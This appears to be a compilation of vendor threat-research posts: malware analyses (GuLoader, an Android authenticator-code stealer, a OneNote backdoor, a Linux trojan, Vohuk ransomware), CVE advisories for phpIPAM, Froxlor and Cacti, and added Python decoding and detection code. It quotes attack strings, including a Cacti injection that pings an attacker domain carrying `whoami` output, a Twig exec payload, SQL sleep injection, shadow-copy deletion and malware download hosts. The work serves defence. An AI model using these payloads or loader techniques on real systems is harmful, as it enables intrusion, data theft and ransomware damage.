New variant of the shellcode malware GuLoader spotted in the wild

GuLoader is a well-known shellcode-based fileless malware which downloads malicious payloads including AgentTesla, NetWire RAT and Remcos RAT. SonicWall RTDMI has been detecting a surge of VBScript files over the past few weeks which download and execute the GuLoader shellcode on the victim’s machine. The SonicWall Capture Labs Threat Research team observed that older variants abused Microsoft OneDrive, but recent variants use Google Drive to host the shellcode and payloads. GuLoader uses advanced anti-virtual-machine, anti-debug and anti-scan techniques, and when executed in a controlled environment it displays an error window saying “This program cannot be run under virtual environment or debugging software!” However, we noticed that in some of the recent variants this anti-VM check is missing:

VBScript

The VBScript contains a huge number of random, unreferenced comments interleaved with the useful code:

The VBScript is more readable after removing the comments, but the obfuscation still makes it complex to understand. The obfuscation includes breaking strings into substrings and using replace methods to reconstruct the actual string. Additionally, the malware echoes a substring on the command prompt and reads the command prompt output back for use in the code:

The VBScript runs the PowerShell executable, passing a partially obfuscated PowerShell script as an argument:

PowerShell Script

The PowerShell script holds another obfuscated PowerShell script in a variable, which is de-obfuscated using the function “Barb9”. The de-obfuscator function takes every other byte (alternate bytes) of the variable to recover the actual PowerShell script:

I have simplified the obfuscated PowerShell script by replacing the variables with their actual values to make it more readable. The malware downloads the shellcode from the URL h[t][t]ps://drive.google.com/uc?export=download&id=1LXM8SwbzycAJ3nYKg_etC8h7htXwbA1L into “%appdata%\Dusinelab.dat”. The malware allocates 0x290 bytes with memory protection PAGE_EXECUTE_READWRITE and 0x496A000 bytes with memory protection PAGE_READWRITE. It reads the bytes from “%appdata%\Dusinelab.dat”, writes the initial 656 bytes into the PAGE_EXECUTE_READWRITE region and writes the remaining bytes into the PAGE_READWRITE region inside the PowerShell process. The malware then calls the injected 656 bytes, passing the address of the other injected bytes as an argument:

GuLoader

The initial 656 bytes decrypt the GuLoader shellcode using a DWORD XOR operation and jump to the decrypted shellcode:
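The two decoding stages described above (the alternate-byte de-obfuscation of the embedded PowerShell, and the DWORD XOR decryption of the shellcode body that follows the 656-byte stub), as an added analyst helper that is not code from the post. The XOR key, the known-plaintext crib and every sample byte are constructed for the demo; the stub's own key-extraction logic is not reproduced, so the analyst supplies either the key or a 4-byte crib.

```python
# Added example (not from the SonicWall post): static helper for the GuLoader decoding
# stages described in the analysis. All sample data below is constructed.
import struct
from typing import Optional, Tuple

STUB_SIZE = 656  # size of the executable decryptor stub written to PAGE_EXECUTE_READWRITE


def deobfuscate_alternate_bytes(blob: bytes, offset: int = 0) -> str:
    """Stage 1: the 'Barb9'-style routine keeps every other byte of the embedded
    string; `offset` selects whether the real script starts at byte 0 or byte 1."""
    return blob[offset::2].decode("latin-1")


def split_dat(dat: bytes, stub_size: int = STUB_SIZE) -> Tuple[bytes, bytes]:
    """Stage 2a: split the downloaded .dat into the decryptor stub and the encrypted body."""
    if len(dat) <= stub_size:
        raise ValueError("blob is not larger than the %d-byte stub" % stub_size)
    return dat[:stub_size], dat[stub_size:]


def xor_dword(data: bytes, key: int) -> bytes:
    """Stage 2b: XOR with a repeating little-endian DWORD key. A trailing partial
    dword is handled byte-wise, which is what a 32-bit loop with a tail would do."""
    key_bytes = struct.pack("<I", key & 0xFFFFFFFF)
    return bytes(b ^ key_bytes[i & 3] for i, b in enumerate(data))


def recover_dword_key(encrypted: bytes, crib: bytes) -> int:
    """Known-plaintext key recovery: if the first four plaintext bytes are known
    (for example a familiar shellcode prologue), key = ciphertext XOR crib."""
    if len(crib) < 4 or len(encrypted) < 4:
        raise ValueError("need at least 4 bytes of crib and ciphertext")
    return struct.unpack("<I", bytes(c ^ p for c, p in zip(encrypted[:4], crib[:4])))[0]


def unpack_dat(dat: bytes, key: Optional[int] = None, crib: Optional[bytes] = None) -> bytes:
    """Full chain: split off the stub, derive the key from a crib if none is given,
    and return the decrypted shellcode body."""
    _stub, body = split_dat(dat)
    if key is None:
        if crib is None:
            raise ValueError("either key or crib is required")
        key = recover_dword_key(body, crib)
    return xor_dword(body, key)


if __name__ == "__main__":
    # Constructed demo: a fake stub of NOPs plus a body encrypted with a made-up key.
    demo_key = 0x1337BEEF
    plain = b"\xfc\xe8\x82\x00\x00\x00" + b"constructed shellcode body " * 3
    dat = b"\x90" * STUB_SIZE + xor_dword(plain, demo_key)
    print(hex(recover_dword_key(dat[STUB_SIZE:], plain[:4])))
    print(unpack_dat(dat, crib=plain[:4]) == plain)
    obf = b"".join(bytes([c, 0x5A]) for c in b"Write-Host 'demo'")
    print(deobfuscate_alternate_bytes(obf))
```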

 

GuLoader then downloads the malware payload onto the victim’s machine. For recent variants, we have observed that AgentTesla and Remcos are the most frequently downloaded malware families. Please refer to the previous blog for a detailed analysis of the GuLoader malware.

The file is detected by only a few security vendors on the popular threat intelligence sharing portal VirusTotal at the time of writing this blog, which indicates its spreading potential:

Evidence of detection by the RTDMI™ engine can be seen below in the Capture ATP report for this file:

IOCs

phpIPAM SQL Injection Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  phpIPAM is a free and open-source web-based IP address management (IPAM) software application. It is designed to help organizations efficiently manage their IP addresses and network infrastructure. The software is built using PHP and a MySQL database and can be accessed through any modern web browser.

  With phpIPAM, users can create, manage and organize IP address spaces, subnets, VLANs, and devices. It also provides features such as IP address tracking, advanced search options, and a comprehensive API for integration with other systems. Additionally, phpIPAM offers advanced features like LDAP and Active Directory integration, IPv6 support, VLAN management, and SNMP integration.

  This vulnerability allows authenticated admins to perform SQL injection. A successful attack may result in the selection of entire tables and, in certain cases, the attacker gaining administrative rights to the database, writing files to the server leading to remote code execution, stored XSS, or writing a script to extract data.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-1211.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 7.2 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is high.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 6.5 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  SQL injection is a common vulnerability in web applications that allows attackers to execute arbitrary SQL commands on the server. In phpIPAM, one such instance occurs when updating custom fields in the admin panel. A malicious web admin can exploit this vulnerability by sending a POST request to the /app/admin/custom-fields/edit-result.php endpoint with parameters such as fieldType and fieldSize. By inserting SQL commands into these parameters, the attacker can have them executed on the server.

  In the example below, the attacker uses the SELECT sleep(3); command to delay the server response by 3 seconds. This may seem like a harmless attack, but attackers can use the same technique to cause more serious damage. For instance, they can inject arbitrary SQL commands or even operating system commands using the system command in SQL. This can allow the attacker to gain access to sensitive data, modify or delete data, or even take control of the entire server.

  To prevent SQL injection attacks, web developers must take appropriate measures such as validating user input, using prepared statements or parameterized queries, and implementing strict input sanitization. In addition, web admins should regularly update their web application frameworks, libraries, and plugins to ensure they are using the latest security patches. Properly securing web applications is critical to protecting sensitive data and ensuring the integrity of the entire system.

Triggering the Problem:

  • The attacker must have network access to the target server.
  • The target must be running a vulnerable version of the software.
  • The attacker must have admin privileges on the target application.

Triggering Conditions:

  The attacker sends a POST Request with a malicious “fieldSize” parameter. The vulnerability is triggered when the server processes the request. This vulnerability allows authenticated admins to perform SQL injection.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • SSL/TLS (HTTPS)
  Example POST Request Packet:
  

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 18920 PhpIPAM SQL Injection 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor supplied patch.
    • Detecting and blocking malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Android malware steals your Google Authenticator codes

The SonicWall Capture Labs Threat Research team came across a malware campaign that steals device information, card information and Google Authenticator codes on Android devices. This malware uses the icons of well-known Android apps to mislead users and trick victims into installing the malicious app on their device. The malicious app may use the following icons:

Fig 1: Malware using famous app icons

 

We also noticed that most of these malicious apps are fairly new and have only recently been submitted to malware-sharing platforms like VirusTotal.

Fig 2: Latest sample found on VT

 

Infection cycle

The critical permissions used in these apps are mentioned below:

  • READ_SMS
  • READ_CALL_LOG
  • READ_CONTACTS
  • READ_EXTERNAL_STORAGE
  • WRITE_EXTERNAL_STORAGE
  • CAMERA
  • RECORD_AUDIO
  • ACCESS_FINE_LOCATION
  • REQUEST_INSTALL_PACKAGES
  • CALL_PHONE

After installation, it asks the victim to enable the accessibility service. Once this option is enabled it becomes difficult to uninstall the application from the device.

Fig 3: Installed malicious app

 

Fig 4: Accessibility permission

 

The malicious application connects to the Command-and-Control server and receives commands to execute operations accordingly, as shown in the image below:

Fig 5: C&C server

 

In its web data directory, it creates a database in which it stores the victim’s personal information and card details.

Fig 6: Database created for storing information

 

Google Authenticator generates two-factor authentication (2FA) codes, which provide stronger security for accounts by requiring a second verification step when a user signs in. This malware evades that additional layer of security by capturing the 2FA codes with the help of the Accessibility service.

Fig 7: Stealing Google authenticator code

 

This malware also sends the victim’s current location to its remote C&C server.

Fig 8: Latest location info

This malware is also capable of taking screenshots of the victim’s device and sending them to the C&C server.


Fig 9: Malware capture screenshots

 

It stores the C&C server’s details, such as the host address (192.168.110.93) and port number (33660), in base64-encoded form.

Fig 10: Network connection

 

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

 

Indicators of Compromise (IOC):


OneNote files are being used to deliver a fileless backdoor

The SonicWall Capture Labs Research team has been keeping an eye on malicious OneNote files for the last few weeks, as they are involved in delivering prevalent malware families including AgentTesla, AsyncRAT and QakBot. OneNote files were not commonly used by cybercriminals until recently. This is evident from the fact that SonicWall RTDMI detected this malicious OneNote file while it was missed by the other security providers available on popular threat intelligence sharing portals at the time of analysis:

 

In previous variants, the malware carried the payloads inside the OneNote file and hid them behind an image. The image content urges the victim to click on the image, which triggers the payload execution. Recently, however, instead of attaching the payload to the OneNote file, the malware author puts in a URL pointing to the payload. This change is made to stay undetected by security vendors, which can trigger detection based on the attached payload files. The OneNote file has no subject line and contains a hyperlink to the short URL “h[t][t]ps://rb.gy/zggy57” labelled “Download from cloud”:

 

The short URL directs the request to h[t][t]p://myccc1.ddnsgeek.com/files/SCAN26022023.docs.zip which downloads an archive file:

 

The archive file contains a Windows Shortcut (LNK) file which downloads a batch script from the URL “http://myccc1.ddnsgeek.com/sched.php” to “%tmp%\1.cmd” using the Client for URL (cURL) utility and executes it:

 

The batch script registers a scheduled task “wXlOKhHBDX” which runs every 2 minutes, and then deletes itself. The scheduled task executes a PowerShell script that in turn invokes a web-hosted PowerShell script:

 

Backdoor

The PowerShell script hosted at the URL “h[t][t]p://myccc1.ddnsgeek.com/rev.php” is a backdoor, obfuscated by aliasing the cmdlets with random names:

 

After replacing the random alias names with the actual cmdlets and formatting the PowerShell script, it becomes readable. The script contains a function which accepts two arguments: a remote host URL and a port number. The PowerShell script runs in a while loop every 3 seconds and tries to connect to the remote host “myccc1.ddnsgeek.com” on port “8448” until the connection is established. The malware sends the username of the victim’s machine to the remote host and receives a PowerShell script in return. It executes the received PowerShell script, sends back the return value and waits for the next command. At the time of analysis the remote host was sending an “echo <random_string>”, which gives us the impression that either the malware author has identified the controlled-environment execution or has suspended the malicious activity for a while:

Evidence of detection by the RTDMI™ engine can be seen below in the Capture ATP report for this file:

A multifunction trojan targeting Linux hosts has been seen in the wild

This week, the SonicWall Capture Labs Research team analyzed a Trojan downloader targeting Linux environments. This Trojan has been around since 2019 but had not been active in the past year until recently. It uses legitimate Linux tools in its infection cycle, along with other novel tricks such as using Tor proxies and DNS over HTTPS to resolve the websites it visits, all of which help mask its malicious behavior.

Infection cycle:

The sample we analyzed is a base64 encoded bash script. Decoding the script revealed a multi-function Trojan.

It has a function called “kurl” that uses bash to perform an HTTP request to download its initial components.

Using this kurl() function, it downloads legitimate Linux tools such as ps, ss and curl (distinct from its own function named kurl, with a “k”). This is done in case the more common curl utility is not yet present on the victim’s machine. Once curl has been downloaded and installed, it uses curl for the rest of the infection cycle.

A function named “sockz” uses DNS over HTTPS to resolve the IP address of the web address “relay.tor2socks.in” by querying the resolvers defined in the variable “n”:

  • dns.twnic.tw
  • doh-ch.blahdns.com
  • doh-de.blahdns.com
  • oh-fi.blahdns.com
  • doh-jp.blahdns.com
  • doh.li
  • doh.pub
  • doh-sg.blahdns.com
  • fi.doh.dns.snopyta.org
  • hydra.plan9-ns1.com

DNS over HTTPS was introduced to prevent malicious actors from monitoring a potential victim’s browsing habits by snooping on DNS traffic. Since traditional DNS lookups travel in plain text, HTTPS provides encryption and prevents that. In this case, however, it also prevents the victim or any system administrator looking at an infected machine from identifying whether the traffic is malicious or not.

It then uses the function u() to send system information about the victim machine, including its IP, hostname, machine name and even the current crontab, to a Tor website that is currently down. It is also supposed to download another component from the same .onion website.

On further research, we found analyses of the same Trojan dating back to 2019, the latest being from 2021, which leads us to believe that we might see more iterations of this Trojan this year.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Malagent.CTR  (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Froxlor 2.0.6 RCE Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Froxlor is a web-based server management panel that allows users to easily manage multiple web hosting accounts on a single server. It is designed to simplify the management of web hosting services for both administrators and end-users. Froxlor provides a simple and intuitive web interface that allows administrators to manage multiple hosting accounts, domains, email accounts, FTP accounts, databases, and more. It also offers a wide range of features such as domain name management, DNS zone management, PHP configuration, SSL certificate management, and more.

  The main benefit of using Froxlor is that it simplifies server administration, making it easier to manage multiple web hosting accounts on a single server. This can save time and reduce the risk of errors when managing web hosting services. Froxlor is open-source software and is available for free under the GNU General Public License. It can be installed on most Linux distributions and is compatible with Apache, Nginx, and Lighttpd web servers.

  A remote code execution vulnerability has been reported in Froxlor 2.0.6. This vulnerability is due to an arbitrary file write combined with server-side template injection.

  Successfully exploiting this vulnerability could allow an authenticated attacker to achieve full remote command execution at the OS level as the web server user.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-0315.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 7.9 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof-of-concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  By exploiting an arbitrary file write vulnerability in Froxlor’s logging feature, an attacker can point the log file to any writable path on the system. This includes paths within the web server’s document root, which allows overwriting existing Twig templates located under the default “templates/Froxlor/” path.

  When the logging feature is enabled on the server, the attacker can use it to log specific actions to the log file. For example, when an admin user changes their theme, that action is logged; the attacker sets the theme name to a custom Twig template, and the log entry containing it is written into an existing Twig template file such as footer.html.twig.

  One malicious Twig template an attacker could use is {{['id']|filter('exec')}}. When this template is rendered, it calls the function exec() with the value “id”. This allows the attacker to execute arbitrary commands on the server and potentially gain further access to the system.

Triggering the Problem:

  • The attacker must have network access to the target server.
  • The target must be running a vulnerable version of the software.
  • The target server must have the logging feature enabled.

Triggering Conditions:

  The attacker authenticates and sends a crafted POST request to the target server. By exploiting the arbitrary file write vulnerability, the attacker redirects the server’s log file to a writable path. With this access, the attacker can then overwrite an existing Twig template with a malicious one of their own design. The vulnerability is triggered when the server validates the request and executes the custom Twig template, which runs the attacker’s code and potentially grants further access to the system.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • SSL/TLS (HTTPS)

  Example Attack Packet:

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 15836 Froxlor Remote Command Execution

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor supplied patch.
    • Detecting and blocking malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Cacti Command Injection Vulnerability

Cacti is an open-source, web-based network monitoring, performance, fault and configuration management framework designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.

A command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.

Cacti Command Injection Vulnerability | CVE-2022-46169

The command injection vulnerability exists in the remote_agent.php file.

As seen from the code fix, the vulnerability in Cacti exists in the way it processes a specific HTTP query associated with a particular type of polling “action” that is defined in the database. In Cacti, users can define actions to monitor a single host or “poller.” One of these poller types executes a PHP script, which expects correctly formatted return data. However, the vulnerability occurs because one of the query arguments used to execute these PHP scripts is not properly sanitized and is passed on to the execution call, resulting in command injection.

Here are some examples of exploit attempts:

“poller_id=;ping%20-c%202%20whoami.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun” This attempts to inject a command into the poller_id parameter by appending, after a semicolon (;), a command that pings a domain controlled by the attacker. The command also uses command substitution to execute whoami and insert its output into the command being executed. The purpose is to send a ping request to an attacker-controlled domain whose name includes the result of whoami, which could be used to identify the username of the user running the Cacti remote agent script.

 

The part of the request touch+%2Ftmp%2FTMSR is an attempt to execute a shell command on the server that creates a file named TMSR in the /tmp/ directory using the touch command. This request is a malicious attempt to gain unauthorized access to the server running the Cacti network monitoring system.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 15808: Cacti remote_agent Command Injection

Cacti has patched this vulnerability.
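Request-inspection logic for the three web flaws covered on this page (the phpIPAM custom-fields SQL injection, the Froxlor Twig template injection and the Cacti remote_agent.php command injection), as an added example that is not SonicWall's signature logic or any of the vendors' code. Endpoint paths and parameter names come from the posts; the hostnames, the Froxlor settings path and the sample payload values are constructed for the demo.

```python
# Added example (not from the SonicWall posts): detection rules over constructed
# HTTP request records for the phpIPAM, Cacti and Froxlor flaws described on this page.
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus, urlsplit

# Markers that have no business in a custom-field type or size value.
SQL_MARKERS = re.compile(r"(;|--|/\*|\bsleep\s*\(|\bbenchmark\s*\(|\bunion\b|\bselect\b)", re.I)
# A Twig expression that reaches a filter/exec/system call, e.g. {{['id']|filter('exec')}}.
TWIG_EXPR = re.compile(r"\{\{.*?(\|\s*filter\s*\(|\|\s*map\s*\(|\bexec\b|\bsystem\b).*?\}\}", re.S)


def _parse_form(data: str) -> Dict[str, List[str]]:
    """Split on '&' only and decode %XX and '+', so ';' inside a value survives intact."""
    params: Dict[str, List[str]] = {}
    for pair in data.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def _params(method: str, url: str, body: str) -> Dict[str, List[str]]:
    """Merge query-string parameters with form-body parameters of a POST."""
    params = _parse_form(urlsplit(url).query)
    if method.upper() == "POST" and body:
        for name, values in _parse_form(body).items():
            params.setdefault(name, []).extend(values)
    return params


def inspect_request(method: str, url: str, body: str = "") -> List[str]:
    """Return the rule names that fire for one request; an empty list means no finding."""
    path = urlsplit(url).path
    params = _params(method, url, body)
    hits: List[str] = []

    # phpIPAM (CVE-2023-1211): fieldType/fieldSize flow into the SQL that alters the
    # custom-field column. Legitimate values are plain type names and sizes.
    if path.endswith("/app/admin/custom-fields/edit-result.php"):
        for name in ("fieldType", "fieldSize"):
            for value in params.get(name, []):
                if SQL_MARKERS.search(value) or not re.fullmatch(r"[A-Za-z0-9_(),]*", value):
                    hits.append("phpipam_custom_fields_sqli:" + name)

    # Cacti (CVE-2022-46169): poller_id reaches a shell unsanitised. A genuine poller id
    # is a small integer, so ";ping ..." or "1;touch /tmp/TMSR" is injection.
    if path.endswith("/remote_agent.php"):
        if any(not value.isdigit() for value in params.get("poller_id", [])):
            hits.append("cacti_remote_agent_cmdi")

    # Froxlor (CVE-2023-0315): a Twig expression submitted as a setting value (the post's
    # example is the theme name) ends up inside a template file via the redirected log.
    for name, values in params.items():
        if any(TWIG_EXPR.search(value) for value in values):
            hits.append("froxlor_twig_ssti:" + name)
    return hits


def scan(records: List[Tuple[str, str, str]]) -> Dict[int, List[str]]:
    """Run inspect_request over (method, url, body) tuples; keys are indexes with findings."""
    findings: Dict[int, List[str]] = {}
    for index, (method, url, body) in enumerate(records):
        hits = inspect_request(method, url, body)
        if hits:
            findings[index] = hits
    return findings


# Constructed sample traffic (hostnames, the Froxlor settings path and payloads are made up).
SAMPLE_REQUESTS = [
    ("POST", "https://ipam.example.test/app/admin/custom-fields/edit-result.php", "fieldType=varchar&fieldSize=128"),
    ("POST", "https://ipam.example.test/app/admin/custom-fields/edit-result.php", "fieldType=varchar&fieldSize=10%3BSELECT+sleep(3)"),
    ("GET", "https://cacti.example.test/remote_agent.php?poller_id=1", ""),
    ("GET", "https://cacti.example.test/remote_agent.php?poller_id=;ping%20-c%202%20whoami.example.test", ""),
    ("GET", "https://cacti.example.test/remote_agent.php?poller_id=1;touch+%2Ftmp%2FTMSR", ""),
    ("POST", "https://panel.example.test/settings.php", "theme=Sparkle"),
    ("POST", "https://panel.example.test/settings.php", "theme=%7B%7B%5B%27id%27%5D%7Cfilter%28%27exec%27%29%7D%7D"),
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_REQUESTS).items():
        print(index, SAMPLE_REQUESTS[index][1], hits)
```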

Threat Graph

Vohuk ransomware uses Cipher.exe, making file recovery impossible

Recently, the SonicWall Capture Labs Research team analyzed a ransomware called Vohuk, which uses the genuine Windows tool Cipher.exe to overwrite deleted files, making their recovery impossible.

Cipher.exe is a command-line tool for managing encrypted data using the Encrypting File System (EFS). When a file or folder is deleted, the data itself is not erased; only the disk space it occupied is deallocated. Until that space is overwritten, there is a possibility that the deleted data can be recovered using a low-level disk editor or data-recovery software. Administrators use Cipher.exe to encrypt and decrypt data on drives that use the NTFS file system. During encryption, Windows makes a backup copy of the file so the data is not lost if an error occurs; after encryption completes, the backup copy is deleted. As with other deleted files, the data is not removed until it has been overwritten. To prevent unauthorized recovery of such data, Windows provides this overwrite capability in Cipher.exe.

The ransomware abuses this feature of Cipher.exe to overwrite the deleted data and so make recovery of the files impossible.

Infection Cycle:

At the start of execution it creates a named mutex “Global\VohukMutes” to avoid multiple instances of the Vohuk ransomware running on the same system.

It creates the folder C:\ProgramData\Vohuk on the root drive, as shown below, copies itself there as App.exe and also creates a log file which it uses for logging its activities.

At the start of the Log.txt file it writes its name, VohukCrypter V1.51, together with its version number.

The ransomware collects any command-line options passed at the time of execution. It checks for the following string options in the command-line parameters and may change its behaviour depending on which are provided:

  • /NOKILL
  • /NOMOUNT
  • /NOEMPTY
  • /LAN
  • /NOLOCAL
  • /NONETDRIVE
  • /NOSTARTUP
  • /FULL
  • /FAST
  • /PATH=

The ransomware calls the GetSystemInfo API to get the number of processors present on the system.

The number of threads created depends on the number of processors, with one thread per processor. If there are more than 64 processors, the ransomware creates at most 64 threads.

Before encrypting files it first empties the Recycle Bin on all drives.

It launches a command prompt process and passes a vssadmin command to it to delete the volume shadow copies.

The ransomware kills the processes listed below if they are found running on the system, so that it can encrypt files which are currently in use.

It also enumerates services and kills the services listed below, together with their dependent services, if found running on the system.

The ransomware uses multi-threading via the I/O completion port APIs CreateIoCompletionPort(), PostQueuedCompletionStatus() and GetQueuedCompletionStatus() to handle multiple files concurrently, and the thread priority is set to high for quick encryption.

The ransomware avoids encrypting files with the filenames listed below.

It also avoids encrypting files with the extensions listed below, so that the normal functioning of the operating system is not hampered.

The ransomware checks the file attributes before encryption; if the READ_ONLY attribute is set, it clears it.

It encrypts the files, renames them with the added extension “.Vohuk” and drops a ransom note file named R3ADM3.txt in each folder.

Once the encryption process is complete, it uses the genuine Windows tool Cipher.exe on all drives to overwrite the deleted data.

The ransomware also replaces the desktop wallpaper with its own.
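Endpoint detection logic for the Vohuk behaviours described above (mutex, shadow-copy deletion, the .Vohuk extension and R3ADM3.txt note, and the post-encryption Cipher.exe run), as an added example that is not code from the post. The telemetry records are constructed, and the cipher.exe /w: switch used in them is the tool's documented free-space overwrite option, which the post itself does not quote.

```python
# Added example (not from the SonicWall post): per-host scoring of Vohuk indicators over
# constructed process, file and mutex events. Nothing here is real telemetry.
import re
from collections import defaultdict
from typing import Dict, Iterable, Tuple

Event = Tuple[str, str, str]  # (host, event_type, detail)

# Constructed sample telemetry; backslashes are doubled because these are plain Python strings.
SAMPLE_EVENTS = [
    ("ws01", "mutex", "Global\\VohukMutes"),
    ("ws01", "process", "C:\\Windows\\System32\\cmd.exe /c vssadmin delete shadows /all /quiet"),
    ("ws01", "file_rename", "C:\\Users\\alice\\Documents\\q1.xlsx -> C:\\Users\\alice\\Documents\\q1.xlsx.Vohuk"),
    ("ws01", "file_create", "C:\\Users\\alice\\Documents\\R3ADM3.txt"),
    ("ws01", "process", "C:\\Windows\\System32\\cipher.exe /w:C:\\"),
    ("ws01", "process", "C:\\Windows\\System32\\cipher.exe /w:D:\\"),
    ("ws02", "process", "C:\\Windows\\System32\\cipher.exe /e C:\\Users\\bob\\secret"),  # normal EFS use
    ("ws03", "process", "C:\\Windows\\System32\\cipher.exe /w:C:\\Users\\carol\\old"),   # admin free-space wipe
]

RULES = {
    "vohuk_mutex": re.compile(r"Global\\VohukMutes$"),
    "shadow_copy_deletion": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    "vohuk_extension": re.compile(r"\.Vohuk$", re.I),
    "vohuk_ransom_note": re.compile(r"\\R3ADM3\.txt$", re.I),
    # cipher.exe /w:<dir> overwrites free space on that volume. Vohuk runs it on every drive
    # after encryption, but on its own it is also legitimate administrative hygiene.
    "cipher_wipe_free_space": re.compile(r"\bcipher(\.exe)?\s+.*?/w:", re.I),
}


def score_hosts(events: Iterable[Event]) -> Dict[str, Dict[str, int]]:
    """Count rule matches per host; hosts with no match are absent from the result."""
    per_host: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for host, _event_type, detail in events:
        for name, pattern in RULES.items():
            if pattern.search(detail):
                per_host[host][name] += 1
    return {host: dict(hits) for host, hits in per_host.items()}


def alerts(events: Iterable[Event]) -> Dict[str, str]:
    """Turn per-host counts into a verdict. A free-space wipe alone only warrants review;
    combined with shadow-copy deletion, or with any Vohuk artefact, it is the
    post-encryption step the analysis describes."""
    verdicts: Dict[str, str] = {}
    for host, hits in score_hosts(events).items():
        vohuk = any(name in hits for name in ("vohuk_mutex", "vohuk_extension", "vohuk_ransom_note"))
        wipe = "cipher_wipe_free_space" in hits
        shadow = "shadow_copy_deletion" in hits
        if vohuk:
            verdicts[host] = "critical: Vohuk ransomware artefacts" + (" + post-encryption wipe" if wipe else "")
        elif wipe and shadow:
            verdicts[host] = "high: shadow copies deleted and free space wiped"
        elif wipe:
            verdicts[host] = "info: cipher.exe free-space wipe (review)"
    return verdicts


if __name__ == "__main__":
    for host, verdict in alerts(SAMPLE_EVENTS).items():
        print(host, verdict)
```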

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: VohukCrypt.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Microsoft Security Bulletin Coverage for February 2023

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of February 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-21529 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 3520: Microsoft Exchange Server Remote Code Execution (CVE-2023-21529)

CVE-2023-21688 NT OS Kernel Elevation of Privilege Vulnerability
ASPY 403: Malicious-exe exe.MP_297

CVE-2023-21689 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 404: Malicious-exe exe.MP_298

CVE-2023-21690 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 405: Malicious-exe exe.MP_299

CVE-2023-21692 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 406: Malicious-exe exe.MP_300

CVE-2023-21706 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 15834: Microsoft Exchange Server Remote Code Execution (CVE-2023-21706)

CVE-2023-21715 Microsoft Office Security Feature Bypass Vulnerability
ASPY 410: Malformed-File pub.MP.6

CVE-2023-21812 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 409: Malicious-exe exe.MP_303

CVE-2023-21823 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 408: Malicious-exe exe.MP_302

CVE-2023-23376 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 407: Malicious-exe exe.MP_301

The following vulnerabilities do not have exploits in the wild:
CVE-2023-21528 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21553 Azure DevOps Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
